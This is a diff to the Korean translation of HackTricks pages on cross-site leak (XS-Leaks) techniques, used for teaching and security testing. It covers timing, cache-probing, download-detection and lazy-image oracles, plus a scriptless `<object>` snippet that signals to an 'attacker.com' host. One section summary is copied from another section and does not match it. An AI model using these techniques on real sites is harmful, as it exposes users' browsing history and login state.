 이러한 제한에도 불구하고 링크의 방문 상태를 간접적으로 식별할 수 있습니다. 한 가지 기술은 사용자가 CSS에 영향을 받는 영역과 상호작용하도록 유도하는 것입니다. 특히 `mix-blend-mode` 속성을 활용합니다. 이 속성은 요소와 배경을 혼합할 수 있게 하여 사용자 상호작용에 따라 방문 상태를 드러낼 수 있습니다.
 
-또한, 링크의 렌더링 타이밍을 악용하여 사용자 상호작용 없이 감지가 가능합니다. 브라우저는 방문한 링크와 방문하지 않은 링크를 다르게 렌더링할 수 있으므로, 이는 렌더링에서 측정 가능한 시간 차이를 초래할 수 있습니다. 타이밍 분석을 통해 방문 상태를 감지할 수 있도록 여러 링크를 사용하여 타이밍 차이를 증폭시키는 기술이 크롬 버그 보고서에서 언급되었습니다.
+또한, 링크의 렌더링 타이밍을 악용하여 사용자 상호작용 없이 감지가 가능합니다. 브라우저는 방문한 링크와 방문하지 않은 링크를 다르게 렌더링할 수 있으므로, 이는 렌더링에서 측정 가능한 시간 차이를 초래할 수 있습니다. 여러 링크를 사용하여 타이밍 차이를 증폭시키는 이 기술을 보여주는 개념 증명(PoC)이 크롬 버그 보고서에 언급되었습니다. 이를 통해 방문 상태를 타이밍 분석을 통해 감지할 수 있습니다.
 
 이러한 속성과 방법에 대한 자세한 내용은 문서 페이지를 방문하십시오:
 
@@ -656,38 +740,38 @@ CSS `:visited` 선택자는 사용자가 이전에 방문한 경우 URL을 다
 - **Inclusion Methods**: Frames, Pop-ups
 - **Detectable Difference**: Headers
 - **More info**: [https://xsleaks.dev/docs/attacks/navigations/#download-trigger](https://xsleaks.dev/docs/attacks/navigations/#download-trigger)
-- **Summary:** 공격자는 iframe을 활용하여 파일 다운로드를 감지할 수 있으며, iframe의 지속적인 접근 가능성은 파일 다운로드가 성공적으로 이루어졌음을 나타냅니다.
+- **Summary:** 공격자는 iframe을 활용하여 파일 다운로드를 감지할 수 있습니다. iframe의 지속적인 접근 가능성은 성공적인 파일 다운로드를 의미합니다.
 - **Code Example**: [https://xsleaks.dev/docs/attacks/navigations/#download-bar](https://xsleaks.dev/docs/attacks/navigations/#download-bar)
 
-`Content-Disposition` 헤더, 특히 `Content-Disposition: attachment`는 브라우저에 콘텐츠를 인라인으로 표시하는 대신 다운로드하도록 지시합니다. 이 동작은 사용자가 파일 다운로드를 유발하는 페이지에 접근할 수 있는지 감지하는 데 악용될 수 있습니다. 크로미움 기반 브라우저에서는 이 다운로드 동작을 감지하는 몇 가지 기술이 있습니다:
+`Content-Disposition` 헤더, 특히 `Content-Disposition: attachment`는 브라우저에 콘텐츠를 인라인으로 표시하는 대신 다운로드하도록 지시합니다. 이 동작은 사용자가 파일 다운로드를 트리거하는 페이지에 접근할 수 있는지 감지하는 데 악용될 수 있습니다. 크로미움 기반 브라우저에서는 이 다운로드 동작을 감지하는 몇 가지 기술이 있습니다:
 
 1. **다운로드 바 모니터링**:
 - 크로미움 기반 브라우저에서 파일이 다운로드되면 브라우저 창 하단에 다운로드 바가 나타납니다.
 - 창 높이의 변화를 모니터링하여 다운로드 바의 나타남을 추론할 수 있습니다.
 2. **iframe을 통한 다운로드 탐색**:
-- 페이지가 `Content-Disposition: attachment` 헤더를 사용하여 파일 다운로드를 유발할 때 탐색 이벤트를 발생시키지 않습니다.
+- 페이지가 `Content-Disposition: attachment` 헤더를 사용하여 파일 다운로드를 트리거할 때 탐색 이벤트를 발생시키지 않습니다.
 - 콘텐츠를 iframe에 로드하고 탐색 이벤트를 모니터링하여 콘텐츠 배치가 파일 다운로드를 유발하는지(탐색 없음) 여부를 확인할 수 있습니다.
 3. **iframe 없이 다운로드 탐색**:
 - iframe 기술과 유사하게, 이 방법은 iframe 대신 `window.open`을 사용합니다.
-- 새로 열린 창에서 탐색 이벤트를 모니터링하여 파일 다운로드가 유발되었는지(탐색 없음) 또는 콘텐츠가 인라인으로 표시되었는지(탐색 발생)를 확인할 수 있습니다.
+- 새로 열린 창에서 탐색 이벤트를 모니터링하여 파일 다운로드가 트리거되었는지(탐색 없음) 또는 콘텐츠가 인라인으로 표시되었는지(탐색 발생)를 확인할 수 있습니다.
 
-로그인한 사용자만 이러한 다운로드를 유발할 수 있는 경우, 이러한 기술을 사용하여 다운로드 요청에 대한 브라우저의 응답을 기반으로 사용자의 인증 상태를 간접적으로 추론할 수 있습니다.
+로그인한 사용자만 이러한 다운로드를 트리거할 수 있는 경우, 이러한 기술을 사용하여 다운로드 요청에 대한 브라우저의 응답을 기반으로 사용자의 인증 상태를 간접적으로 추론할 수 있습니다.
 
 ### Partitioned HTTP Cache Bypass <a href="#partitioned-http-cache-bypass" id="partitioned-http-cache-bypass"></a>
 
 - **Inclusion Methods**: Pop-ups
 - **Detectable Difference**: Timing
 - **More info**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass)
-- **Summary:** 공격자는 iframe을 활용하여 파일 다운로드를 감지할 수 있으며, iframe의 지속적인 접근 가능성은 파일 다운로드가 성공적으로 이루어졌음을 나타냅니다.
+- **Summary:** 공격자는 iframe을 활용하여 파일 다운로드를 감지할 수 있습니다. iframe의 지속적인 접근 가능성은 성공적인 파일 다운로드를 의미합니다.
 - **Code Example**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass), [https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722](https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722) (from [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/))
 
 > [!WARNING]
-> 이 기술이 흥미로운 이유는: 크롬은 이제 **캐시 파티셔닝**을 가지고 있으며, 새로 열린 페이지의 캐시 키는: `(https://actf.co, https://actf.co, https://sustenance.web.actf.co/?m =xxx)`입니다. 그러나 ngrok 페이지를 열고 fetch를 사용하면 캐시 키는: `(https://myip.ngrok.io, https://myip.ngrok.io, https://sustenance.web.actf.co/?m=xxx)`가 됩니다. **캐시 키가 다르므로** 캐시를 공유할 수 없습니다. 여기에서 더 많은 세부정보를 찾을 수 있습니다: [Gaining security and privacy by partitioning the cache](https://developer.chrome.com/blog/http-cache-partitioning/)\
+> 이 기술이 흥미로운 이유는: 크롬은 이제 **캐시 파티셔닝**을 가지고 있으며, 새로 열린 페이지의 캐시 키는: `(https://actf.co, https://actf.co, https://sustenance.web.actf.co/?m =xxx)`입니다. 그러나 ngrok 페이지를 열고 fetch를 사용하면 캐시 키는: `(https://myip.ngrok.io, https://myip.ngrok.io, https://sustenance.web.actf.co/?m=xxx)`가 됩니다. **캐시 키가 다릅니다**, 따라서 캐시를 공유할 수 없습니다. 여기에서 더 많은 세부 정보를 찾을 수 있습니다: [Gaining security and privacy by partitioning the cache](https://developer.chrome.com/blog/http-cache-partitioning/)\
 > (Comment from [**here**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/))
 
 사이트 `example.com`이 `*.example.com/resource`에서 리소스를 포함하면 해당 리소스는 **최상위 탐색을 통해 직접 요청된 것처럼** **동일한 캐싱 키**를 가집니다. 이는 캐싱 키가 최상위 _eTLD+1_ 및 프레임 _eTLD+1_로 구성되기 때문입니다.
 
-캐시에 접근하는 것이 리소스를 로드하는 것보다 빠르기 때문에, 페이지의 위치를 변경하고 20ms 후(예:) 취소할 수 있습니다. 원본이 중지 후 변경되었다면, 리소스가 캐시되었음을 의미합니다.\
+캐시에 접근하는 것이 리소스를 로드하는 것보다 빠르기 때문에, 페이지의 위치를 변경하고 20ms 후에 취소하려고 시도할 수 있습니다(예:). 원본이 중지 후 변경되었다면, 리소스가 캐시되었음을 의미합니다.\
 또는 **잠재적으로 캐시된 페이지에 대해 fetch를 보내고 소요 시간을 측정할 수 있습니다**.
 
 ### Manual Redirect <a href="#fetch-with-abortcontroller" id="fetch-with-abortcontroller"></a>
@@ -705,10 +789,10 @@ CSS `:visited` 선택자는 사용자가 이전에 방문한 경우 URL을 다
 - **Inclusion Methods**: Fetch API
 - **Detectable Difference**: Timing
 - **More info**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
-- **Summary:** 리소스를 로드하려고 시도하고 로드되기 전에 로드를 중단할 수 있습니다. 오류가 발생하는지 여부에 따라 리소스가 캐시되었거나 그렇지 않을 수 있습니다.
+- **Summary:** 리소스를 로드하려고 시도하고 로드되기 전에 로드를 중단할 수 있습니다. 오류가 발생하는지 여부에 따라 리소스가 캐시되었거나 그렇지 않습니다.
 - **Code Example**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
 
-_**fetch**_와 _**setTimeout**_을 사용하여 **AbortController**로 **리소스가 캐시되었는지** 감지하고 특정 리소스를 브라우저 캐시에서 제거할 수 있습니다. 또한, 이 과정은 새로운 콘텐츠를 캐시하지 않고 발생합니다.
+**AbortController**와 함께 _**fetch**_ 및 _**setTimeout**_을 사용하여 **리소스가 캐시되었는지** 감지하고 특정 리소스를 브라우저 캐시에서 제거할 수 있습니다. 또한, 이 과정은 새로운 콘텐츠를 캐시하지 않고 발생합니다.
 
 ### Script Pollution
 
@@ -726,12 +810,12 @@ _**fetch**_와 _**setTimeout**_을 사용하여 **AbortController**로 **리소
 - **Summary:** 서비스 워커를 사용하여 웹의 실행 시간을 측정합니다.
 - **Code Example**:
 
-주어진 시나리오에서 공격자는 자신의 도메인 중 하나인 "attacker.com" 내에서 **서비스 워커**를 등록하는 주도권을 잡습니다. 다음으로, 공격자는 메인 문서에서 대상 웹사이트의 새 창을 열고 **서비스 워커**에 타이머를 시작하도록 지시합니다. 새 창이 로드되기 시작하면 공격자는 이전 단계에서 얻은 참조를 **서비스 워커**가 관리하는 페이지로 탐색합니다.
+주어진 시나리오에서 공격자는 자신의 도메인 중 하나인 "attacker.com" 내에서 **서비스 워커**를 등록합니다. 다음으로, 공격자는 메인 문서에서 대상 웹사이트의 새 창을 열고 **서비스 워커**에게 타이머를 시작하도록 지시합니다. 새 창이 로드되기 시작하면 공격자는 이전 단계에서 얻은 참조를 **서비스 워커**가 관리하는 페이지로 탐색합니다.
 
-이전 단계에서 시작된 요청이 도착하면 **서비스 워커**는 **204 (No Content)** 상태 코드로 응답하여 탐색 프로세스를 종료합니다. 이 시점에서 **서비스 워커**는 이전 단계에서 시작된 타이머의 측정을 캡처합니다. 이 측정치는 탐색 프로세스의 지연을 초래하는 JavaScript의 지속 시간에 의해 영향을 받습니다.
+이전 단계에서 시작된 요청이 도착하면 **서비스 워커**는 **204 (No Content)** 상태 코드로 응답하여 탐색 프로세스를 종료합니다. 이 시점에서 **서비스 워커**는 이전 단계에서 시작된 타이머의 측정을 캡처합니다. 이 측정치는 탐색 프로세스의 지연을 초래하는 JavaScript의 지속 시간에 영향을 받습니다.
 
 > [!WARNING]
-> 실행 타이밍에서는 **네트워크 요인**을 **제거**하여 **더 정확한 측정값**을 얻을 수 있습니다. 예를 들어, 페이지를 로드하기 전에 페이지에서 사용하는 리소스를 로드합니다.
+> 실행 타이밍에서는 **네트워크 요인**을 **제거**하여 **더 정확한 측정값**을 얻을 수 있습니다. 예를 들어, 페이지를 로드하기 전에 페이지에서 사용하는 리소스를 로드하는 것입니다.
 
 ### Fetch Timing
 
@@ -751,7 +835,7 @@ _**fetch**_와 _**setTimeout**_을 사용하여 **AbortController**로 **리소
 
 ## With HTML or Re Injection
 
-여기에서는 **HTML 콘텐츠를 주입하여** 교차 출처에서 정보를 유출하는 기술을 찾을 수 있습니다. 이러한 기술은 어떤 이유로든 **HTML을 주입할 수 있지만 JS 코드를 주입할 수 없는** 경우에 흥미롭습니다.
+여기에서는 교차 출처 HTML에서 **HTML 콘텐츠를 주입하여** 정보를 유출하는 기술을 찾을 수 있습니다. 이러한 기술은 어떤 이유로든 **HTML을 주입할 수 있지만 JS 코드를 주입할 수 없는 경우** 흥미롭습니다.
 
 ### Dangling Markup
 
@@ -761,35 +845,35 @@ dangling-markup-html-scriptless-injection/
 
 ### Image Lazy Loading
 
-**콘텐츠를 유출해야 하고 비밀 이전에 HTML을 추가할 수 있는 경우**, **일반적인 dangling markup 기술**을 확인해야 합니다.\
-그러나 어떤 이유로든 **문자 단위로** 수행해야 하는 경우(예: 캐시 적중을 통한 통신) 이 요령을 사용할 수 있습니다.
+비밀 이전에 **콘텐츠를 유출해야** 하고 **HTML을 추가할 수 있는 경우** **일반적인 dangling markup 기술**을 확인해야 합니다.\
+그러나 어떤 이유로든 **문자 단위로** 수행해야 하는 경우(예: 통신이 캐시 적중을 통해 이루어지는 경우) 이 트릭을 사용할 수 있습니다.
 
 HTML의 **이미지**는 "**loading**" 속성이 있으며, 그 값은 "**lazy**"일 수 있습니다. 이 경우 이미지는 페이지가 로드되는 동안이 아니라 볼 때 로드됩니다:
 ```html
 <img src=/something loading=lazy >
 ```
 따라서 할 수 있는 것은 **많은 쓰레기 문자**를 **추가하는 것**입니다 (예: **수천 개의 "W"**) **비밀 앞에 웹 페이지를 채우거나** `<br><canvas height="1850px"></canvas><br>`와 같은 것을 추가하는 것입니다.\
-예를 들어, 우리의 **주입이 플래그 앞에 나타나면**, **이미지**가 **로드되지만**, **플래그 뒤에 나타나면**, 플래그 + 쓰레기가 **로드되는 것을 방지합니다** (얼마나 많은 쓰레기를 배치할지 조정해야 합니다). 이것은 [**이 글**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/)에서 발생한 일입니다.
+예를 들어, 우리의 **주입이 플래그 앞에 나타나면**, **이미지**가 **로드되지만**, **플래그 뒤에 나타나면**, 플래그 + 쓰레기가 **로드되는 것을 방지합니다** (얼마나 많은 쓰레기를 배치할지는 조정해야 합니다). 이것은 [**이 글**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/)에서 발생한 일입니다.
 
-또 다른 옵션은 **scroll-to-text-fragment**를 사용하는 것입니다, 허용되는 경우:
+또 다른 옵션은 **scroll-to-text-fragment**를 사용하는 것입니다, 허용된다면:
 
 #### Scroll-to-text-fragment
 
-그러나 **봇이 페이지에 접근하도록** 만들 수 있습니다, 예를 들어
+그러나 **봇이 페이지에 접근하게** 하려면 다음과 같은 것을 사용해야 합니다.
 ```
 #:~:text=SECR
 ```
 웹 페이지는 다음과 같을 것입니다: **`https://victim.com/post.html#:~:text=SECR`**
 
-여기서 post.html은 공격자의 쓰레기 문자와 지연 로드 이미지를 포함하고 있으며, 그 다음에 봇의 비밀이 추가됩니다.
+여기서 post.html은 공격자의 쓰레기 문자와 지연 로드 이미지가 포함되어 있으며, 그 아래에 봇의 비밀이 추가됩니다.
 
-이 텍스트는 봇이 페이지에서 `SECR`이라는 텍스트를 포함하는 모든 텍스트에 접근하게 만듭니다. 그 텍스트는 비밀이며 **이미지 바로 아래에** 위치하므로, **정확한 비밀이 추측되면 이미지만 로드됩니다**. 따라서 비밀을 **문자 단위로 유출할 수 있는 오라클이 생깁니다**.
+이 텍스트는 봇이 페이지에서 `SECR`이라는 텍스트를 포함하는 모든 텍스트에 접근하게 만듭니다. 그 텍스트가 비밀이고 **이미지 바로 아래에** 있기 때문에, **정확한 비밀이 추측되면 이미지만 로드됩니다**. 따라서 비밀을 **문자 단위로 유출할 수 있는 오라클이 생깁니다**.
 
 이를 이용한 코드 예시는 다음과 같습니다: [https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e](https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e)
 
 ### 이미지 지연 로딩 시간 기반
 
-외부 이미지를 로드할 수 **없는 경우**, 이는 공격자에게 이미지가 로드되었음을 나타낼 수 있습니다. 또 다른 옵션은 **문자를 여러 번 추측하고 그 시간을 측정하는 것**입니다. 이미지가 로드되면 모든 요청이 이미지가 로드되지 않았을 때보다 더 오래 걸립니다. 이는 [**이 글의 해결책**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/)에서 사용된 방법입니다. **여기 요약되어 있습니다:**
+**외부 이미지를 로드할 수 없는 경우** 공격자에게 이미지가 로드되었음을 알릴 수 있는 또 다른 옵션은 **문자를 여러 번 추측하고 이를 측정하는 것입니다**. 이미지가 로드되면 모든 요청이 이미지가 로드되지 않았을 때보다 더 오래 걸립니다. 이것은 [**이 글의 해결책**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/)에서 사용된 방법입니다. **여기 요약되어 있습니다:**
 
 {{#ref}}
 xs-search/event-loop-blocking-+-lazy-images.md
@@ -803,7 +887,7 @@ regular-expression-denial-of-service-redos.md
 
 ### CSS ReDoS
 
-`jQuery(location.hash)`가 사용되면, **어떤 HTML 콘텐츠가 존재하는지** 타이밍을 통해 알 수 있습니다. 이는 선택자 `main[id='site-main']`가 일치하지 않으면 나머지 **선택자**를 확인할 필요가 없기 때문입니다.
+`jQuery(location.hash)`가 사용되면, **일부 HTML 콘텐츠가 존재하는지** 타이밍을 통해 알아낼 수 있습니다. 이는 선택자 `main[id='site-main']`가 일치하지 않으면 나머지 **선택자**를 확인할 필요가 없기 때문입니다.
 ```javascript
 $(
 "*:has(*:has(*:has(*)) *:has(*:has(*:has(*))) *:has(*:has(*:has(*)))) main[id='site-main']"
diff --git a/src/pentesting-web/xs-search/README.md b/src/pentesting-web/xs-search/README.md
index b96b0de04..5a1718ea8 100644
--- a/src/pentesting-web/xs-search/README.md
+++ b/src/pentesting-web/xs-search/README.md
@@ -22,29 +22,29 @@ XS-Search는 **사이드 채널 취약점**을 활용하여 **교차 출처 정
 - **상태 코드**: 서버 오류, 클라이언트 오류 또는 인증 오류와 같은 **다양한 HTTP 응답 상태 코드**를 교차 출처에서 구별합니다.
 - **API 사용**: 특정 JavaScript 웹 API를 사용하는 교차 출처 페이지를 드러내는 **웹 API 사용** 식별.
 - **리디렉션**: HTTP 리디렉션뿐만 아니라 JavaScript 또는 HTML에 의해 트리거된 다른 페이지로의 탐색 감지.
-- **페이지 내용**: **HTTP 응답 본문** 또는 페이지 하위 리소스에서의 변동 관찰, 예를 들어 **내장된 프레임 수** 또는 이미지 크기 차이.
+- **페이지 내용**: **HTTP 응답 본문** 또는 페이지 하위 리소스에서의 **변동 관찰**, 예를 들어 **임베디드 프레임 수** 또는 이미지 크기 차이.
 - **HTTP 헤더**: **특정 HTTP 응답 헤더**의 존재 또는 값(예: X-Frame-Options, Content-Disposition, Cross-Origin-Resource-Policy) 주목.
 - **타이밍**: 두 상태 간의 일관된 시간 차이 감지.
 
 ### 포함 방법
 
-- **HTML 요소**: HTML은 **교차 출처 리소스 포함**을 위한 다양한 요소를 제공하며, 스타일시트, 이미지 또는 스크립트와 같은 비HTML 리소스를 요청하도록 브라우저를 강제합니다. 이 목적을 위한 잠재적인 HTML 요소 목록은 [https://github.com/cure53/HTTPLeaks](https://github.com/cure53/HTTPLeaks)에서 확인할 수 있습니다.
+- **HTML 요소**: HTML은 **교차 출처 리소스 포함**을 위한 다양한 요소를 제공하며, 스타일시트, 이미지 또는 스크립트와 같은 비HTML 리소스를 요청하도록 브라우저를 강제합니다. 이 목적을 위한 잠재적 HTML 요소의 목록은 [https://github.com/cure53/HTTPLeaks](https://github.com/cure53/HTTPLeaks)에서 확인할 수 있습니다.
 - **프레임**: **iframe**, **object**, **embed**와 같은 요소는 HTML 리소스를 공격자의 페이지에 직접 포함할 수 있습니다. 페이지가 **프레임 보호가 부족한 경우**, JavaScript는 contentWindow 속성을 통해 프레임된 리소스의 window 객체에 접근할 수 있습니다.
 - **팝업**: **`window.open`** 메서드는 새 탭이나 창에서 리소스를 열어 JavaScript가 SOP에 따라 메서드 및 속성과 상호작용할 수 있는 **창 핸들**을 제공합니다. 팝업은 종종 단일 로그인에서 사용되며, 대상 리소스의 프레임 및 쿠키 제한을 우회합니다. 그러나 최신 브라우저는 특정 사용자 작업에만 팝업 생성을 제한합니다.
 - **JavaScript 요청**: JavaScript는 **XMLHttpRequests** 또는 **Fetch API**를 사용하여 대상 리소스에 직접 요청할 수 있습니다. 이러한 방법은 HTTP 리디렉션을 따르도록 선택하는 등 요청에 대한 정밀한 제어를 제공합니다.
 
 ### 유출 기술
 
-- **이벤트 핸들러**: XS-Leaks에서 고전적인 유출 기술로, **onload** 및 **onerror**와 같은 이벤트 핸들러가 리소스 로딩 성공 또는 실패에 대한 통찰력을 제공합니다.
+- **이벤트 핸들러**: 리소스 로딩 성공 또는 실패에 대한 통찰력을 제공하는 **onload** 및 **onerror**와 같은 이벤트 핸들러에서의 고전적인 유출 기술.
 - **오류 메시지**: JavaScript 예외 또는 특수 오류 페이지는 오류 메시지에서 직접 또는 존재 여부에 따라 유출 정보를 제공할 수 있습니다.
-- **전역 한계**: 메모리 용량이나 다른 강제 브라우저 한계와 같은 브라우저의 물리적 제한은 임계값에 도달했을 때 신호를 보낼 수 있으며, 이는 유출 기술로 작용합니다.
+- **전역 한계**: 메모리 용량 또는 기타 강제 브라우저 한계와 같은 브라우저의 물리적 제한은 임계값에 도달했음을 신호로 제공하여 유출 기술로 작용할 수 있습니다.
 - **전역 상태**: 브라우저의 **전역 상태**(예: History 인터페이스)와의 감지 가능한 상호작용을 악용할 수 있습니다. 예를 들어, 브라우저의 기록에 있는 **항목 수**는 교차 출처 페이지에 대한 단서를 제공할 수 있습니다.
 - **성능 API**: 이 API는 **현재 페이지의 성능 세부정보**를 제공하며, 문서 및 로드된 리소스에 대한 네트워크 타이밍을 포함하여 요청된 리소스에 대한 추론을 가능하게 합니다.
 - **읽을 수 있는 속성**: 일부 HTML 속성은 **교차 출처에서 읽을 수 있으며**, 유출 기술로 사용될 수 있습니다. 예를 들어, `window.frame.length` 속성은 JavaScript가 교차 출처 웹페이지에 포함된 프레임 수를 계산할 수 있게 합니다.
 
 ## XSinator 도구 및 논문
 
-XSinator는 **여러 알려진 XS-Leaks**에 대해 브라우저를 **검사하는 자동 도구**로, 그 논문에서 설명됩니다: [**https://xsinator.com/paper.pdf**](https://xsinator.com/paper.pdf)
+XSinator는 **여러 알려진 XS-Leaks에 대해 브라우저를 확인하는 자동 도구**로, 그 논문에서 설명됩니다: [**https://xsinator.com/paper.pdf**](https://xsinator.com/paper.pdf)
 
 도구에 **접근할 수 있는 곳**: [**https://xsinator.com/**](https://xsinator.com/)
 
@@ -56,7 +56,7 @@ XSinator는 **여러 알려진 XS-Leaks**에 대해 브라우저를 **검사하
 다음 기술 중 일부는 웹 페이지의 가능한 상태에서 차이를 감지하는 과정의 일환으로 타이밍을 사용할 것입니다. 웹 브라우저에서 시간을 측정하는 방법은 여러 가지가 있습니다.
 
 **시계**: [performance.now()](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now) API는 개발자가 고해상도 타이밍 측정을 얻을 수 있게 합니다.\
-공격자가 암묵적인 시계를 생성하기 위해 남용할 수 있는 상당한 수의 API가 있습니다: [Broadcast Channel API](https://developer.mozilla.org/en-US/docs/Web/API/Broadcast_Channel_API), [Message Channel API](https://developer.mozilla.org/en-US/docs/Web/API/MessageChannel), [requestAnimationFrame](https://developer.mozilla.org/en-US/docs/Web/API/window/requestAnimationFrame), [setTimeout](https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/setTimeout), CSS 애니메이션 등.\
+공격자가 암묵적인 시계를 만들기 위해 남용할 수 있는 상당한 수의 API가 있습니다: [Broadcast Channel API](https://developer.mozilla.org/en-US/docs/Web/API/Broadcast_Channel_API), [Message Channel API](https://developer.mozilla.org/en-US/docs/Web/API/MessageChannel), [requestAnimationFrame](https://developer.mozilla.org/en-US/docs/Web/API/window/requestAnimationFrame), [setTimeout](https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/setTimeout), CSS 애니메이션 등.\
 자세한 정보는: [https://xsleaks.dev/docs/attacks/timing-attacks/clocks](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/)에서 확인할 수 있습니다.
 
 ## 이벤트 핸들러 기술
@@ -66,16 +66,16 @@ XSinator는 **여러 알려진 XS-Leaks**에 대해 브라우저를 **검사하
 - **포함 방법**: 프레임, HTML 요소
 - **감지 가능한 차이**: 상태 코드
 - **자세한 정보**: [https://www.usenix.org/conference/usenixsecurity19/presentation/staicu](https://www.usenix.org/conference/usenixsecurity19/presentation/staicu), [https://xsleaks.dev/docs/attacks/error-events/](https://xsleaks.dev/docs/attacks/error-events/)
-- **요약**: 리소스를 로드하려고 할 때 onerror/onload 이벤트가 리소스가 성공적으로/실패적으로 로드되면 트리거되며, 상태 코드를 파악할 수 있습니다.
+- **요약**: 리소스를 로드하려고 할 때 onerror/onload 이벤트가 리소스가 성공적으로/실패적으로 로드되면 상태 코드를 파악할 수 있습니다.
 - **코드 예제**: [https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)](<https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)>)
 
 {{#ref}}
 cookie-bomb-+-onerror-xs-leak.md
 {{#endref}}
 
-코드 예제는 **JS**에서 스크립트 객체를 **로드하려고 시도**하지만, **다른 태그**(예: 객체, 스타일시트, 이미지, 오디오)도 사용할 수 있습니다. 또한, **태그를 직접 주입**하고 태그 내부에 `onload` 및 `onerror` 이벤트를 선언하는 것도 가능합니다(대신 JS에서 주입하는 대신).
+코드 예제는 **JS에서 스크립트 객체를 로드하려고 시도하지만**, **다른 태그**(예: 객체, 스타일시트, 이미지, 오디오)도 사용할 수 있습니다. 또한, **태그를 직접 주입**하고 태그 내부에 `onload` 및 `onerror` 이벤트를 선언하는 것도 가능합니다(대신 JS에서 주입하는 대신).
 
-이 공격의 스크립트 없는 버전도 있습니다:
+이 공격에는 스크립트 없는 버전도 있습니다:
 ```html
 <object data="//example.com/404">
 <object data="//attacker.com/?error"></object>
@@ -97,7 +97,7 @@ performance.now-example.md
 
 #### Onload Timing + Forced Heavy Task
 
-이 기술은 이전 기술과 유사하지만, **attacker**는 **긍정적 또는 부정적 응답**을 받을 때 **상당한 시간**이 걸리도록 **강제** 조치를 취하고 그 시간을 측정합니다.
+이 기술은 이전 기술과 유사하지만, **attacker**는 **긍정적 또는 부정적 응답**을 받을 때 **상당한 시간**이 걸리도록 **강제**하는 작업을 수행하고 그 시간을 측정합니다.
 
 {{#ref}}
 performance.now-+-force-heavy-task.md
@@ -111,7 +111,7 @@ performance.now-+-force-heavy-task.md
 - **Summary:** [SharedArrayBuffer clock](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#sharedarraybuffer-and-web-workers)는 요청을 수행하는 데 걸리는 시간을 측정하는 데 사용할 수 있습니다. 다른 시계를 사용할 수 있습니다.
 - **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events)
 
-리소스를 가져오는 데 걸리는 시간은 [`unload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/unload_event) 및 [`beforeunload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/beforeunload_event) 이벤트를 활용하여 측정할 수 있습니다. **`beforeunload`** 이벤트는 브라우저가 새 페이지로 이동하려고 할 때 발생하고, **`unload`** 이벤트는 실제로 탐색이 이루어질 때 발생합니다. 이 두 이벤트 간의 시간 차이를 계산하여 **브라우저가 리소스를 가져오는 데 소요된 시간**을 결정할 수 있습니다.
+리소스를 가져오는 데 걸리는 시간은 [`unload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/unload_event) 및 [`beforeunload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/beforeunload_event) 이벤트를 활용하여 측정할 수 있습니다. **`beforeunload`** 이벤트는 브라우저가 새 페이지로 이동하려고 할 때 발생하고, **`unload`** 이벤트는 실제로 이동이 이루어질 때 발생합니다. 이 두 이벤트 간의 시간 차이를 계산하여 **브라우저가 리소스를 가져오는 데 소요된 시간**을 결정할 수 있습니다.
 
 ### Sandboxed Frame Timing + onload <a href="#sandboxed-frame-timing-attacks" id="sandboxed-frame-timing-attacks"></a>
 
@@ -121,7 +121,7 @@ performance.now-+-force-heavy-task.md
 - **Summary:** [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) API는 요청을 수행하는 데 걸리는 시간을 측정하는 데 사용할 수 있습니다. 다른 시계를 사용할 수 있습니다.
 - **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks)
 
-[Framing Protections](https://xsleaks.dev/docs/defenses/opt-in/xfo/)이 없는 경우, 페이지와 그 하위 리소스가 네트워크를 통해 로드되는 데 필요한 시간을 공격자가 측정할 수 있는 것으로 관찰되었습니다. 이 측정은 일반적으로 iframe의 `onload` 핸들러가 리소스 로딩 및 JavaScript 실행이 완료된 후에만 트리거되기 때문에 가능합니다. 스크립트 실행으로 인한 변동성을 우회하기 위해 공격자는 `<iframe>` 내에서 [`sandbox`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe) 속성을 사용할 수 있습니다. 이 속성을 포함하면 JavaScript 실행과 같은 여러 기능이 제한되어 네트워크 성능에 주로 영향을 받는 측정을 용이하게 합니다.
